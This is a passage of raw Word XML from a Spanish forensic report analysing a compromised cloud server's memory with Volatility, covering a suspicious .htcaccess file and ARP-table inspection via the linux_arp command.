Lm8YsdhprfvS3vpAxlxag7&#10;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&#10;K5UorjKIQTBPY7UBceacpBHIIpf/Py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tvukaUAwAAJAgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0ACgAAAAAAAAAhANTkEwiZsAAAmbAAABQAAAAAAAAAAAAAAAAA+gUAAGRycy9tZWRpYS9p&#10;bWFnZTEucG5nUEsBAi0AFAAGAAgAAAAhADp6ubLeAAAACQEAAA8AAAAAAAAAAAAAAAAAxbYAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAANC3&#10;AABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAMO4AAAAAA==&#10;">
                <v:shape id="Imagen 57" o:spid="_x0000_s1157" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:38163;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dZzAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPsPkZG4sbQIuq0sm2BigsM0QWF305i2o3GqJnTl3+MD0o72e37v83I9ulYN1IfGs4F0moAi&#10;Lr1tuDLw8b69noMKEdli65kM/FKA9WpyscTc+hO/0VDESkkIhxwN1DF2udahrMlhmPqOWLQv3zuM&#10;MvaVtj2eJNy1+iZJMu2wYWmosaNNTeV38eMMPLbZ8TPOhqfF6/M23W/cYeeLgzFXl+PDPahIYzyb&#10;/69frODfLdLbbDZPBFp+kgXo1R8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAPoR3WcwA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                  <v:imagedata r:id="rId194" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1158" type="#_x0000_t202" style="position:absolute;left:40189;top:4253;width:14885;height:4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8IzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsZvaGGPstpSioF6KsRdvj+xrNpp9G3Y3bfz3riB4HGbmG2a5nmwvjuRD51jBfJaB&#10;IG6c7rhVsH9/ui5BhIissXdMCr4pwHp1frbESrsTv9Gxjq1IEA4VKjAxDpWUoTFkMczcQJy8g/MW&#10;Y5K+ldrjKcFtL2+yrJAWO04LBgfaGmq+6tEq2OUfO3M1Hh5fN/nCv+zHbfHZ1kpdXkybBxCRpvgf&#10;/ms/awVlXpS39/O7BfxeSndArn4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATEP/CMwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6F94D5FF" w14:textId="2278C6DD" w:rsidR="003511D1" w:rsidRPr="006A5FCC" w:rsidRDefault="003511D1" w:rsidP="003511D1">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>40</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="101" w:name="_Toc155782607"/>
                        <w:r w:rsidRPr="00EA46EF">
                          <w:t>Detalles de /var/www/html/.htcaccess.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="101"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:t>En este caso hemos encontrado con un archivo dentro del sistema que puede resultar dañino para el cloud server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93916B" w14:textId="5C96D24A" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="00BD1378"/>
    <w:p w14:paraId="313EA6B7" w14:textId="77CE70D2" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="001C6280">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc155782513"/>
      <w:r w:rsidRPr="000C4414">
        <w:t>3.6.</w:t>
      </w:r>
      <w:r w:rsidR="001C6280">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:t>Listado de conexiones de red y conexiones sospechosas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="4B8E8316" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DC2291" w14:textId="0CD5C95A" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La investigación relativo a las conexiones del servidor </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>analizado</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos permitirá tratar de descubrir cuales son las conexiones que </w:t>
      </w:r>
      <w:r w:rsidR="005A186E" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tenía</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el servidor en el momento de realizar la captura de la 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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, de lo que se puede aportar información valiosa a la hora de la realización de los informes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6AA3A" w14:textId="1A745606" w:rsidR="000C4414" w:rsidRDefault="000C4414" w:rsidP="001C6280">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:t>Linux_arp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8C609" w14:textId="02E5CE59" w:rsidR="00FF4835" w:rsidRPr="00FF4835" w:rsidRDefault="00FF4835" w:rsidP="00FF4835">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155754704 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XVII. Comando linux_arp.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD5566" w14:textId="1B0B4AF6" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En este apartado, nos vamos a enfocar en descubrir la tabla ARP del servidor, para ello ejecutaremos </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_arp</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, gracias a este comando obtendremos una lista detallada de las entradas de ARP, que incluye información vital como las direcciones IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y las direcciones MAC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MAC: Media Access Control, dirección única asignada a la interfaz de red de un dispositivo.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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> asociadas. Esta tabla es esencial para entender cómo el sistema infectado o comprometido estaba comunicándose con otros dispositivos en la red. La información de la tabla ARP puede revelar conexiones de red previas, identificar dispositivos dentro de la red local con los que el sistema interactuó, y puede ser particularmente útil para rastrear la actividad de red sospechosa o maliciosa. El comando usado en este caso es </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_arp</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se adjunta imagen de pantallazo </w:t>
      </w:r>
      <w:r w:rsidR="001C6280" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC45D7C" w14:textId="7A2A3C5E" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="00BD1378" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251781120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E0AF572" wp14:editId="1A2B4FD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>413</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5398889" cy="1095375"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2069565893" name="Grupo 37"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398889" cy="1095375"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398889" cy="1095375"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="820606079" name="Imagen 62"/>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37814" cy="1095375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1909632992" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3838268" y="159489"/>
                            <a:ext cx="1560915" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7348BD08" w14:textId="48C6D346" w:rsidR="003511D1" w:rsidRPr="00CA10B6" w:rsidRDefault="003511D1" w:rsidP="003511D1">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>41</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="103" w:name="_Toc155782608"/>
                              <w:r w:rsidRPr="00CE0941">
                                <w:t>Comando linux_arp.</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0AF572" id="Grupo 37" o:spid="_x0000_s1159" style="position:absolute;left:0;text-align:left;margin-left:373.9pt;margin-top:.05pt;width:425.1pt;height:86.25pt;z-index:251781120;mso-position-horizontal:right;mso-position-horizontal-relative:margin" 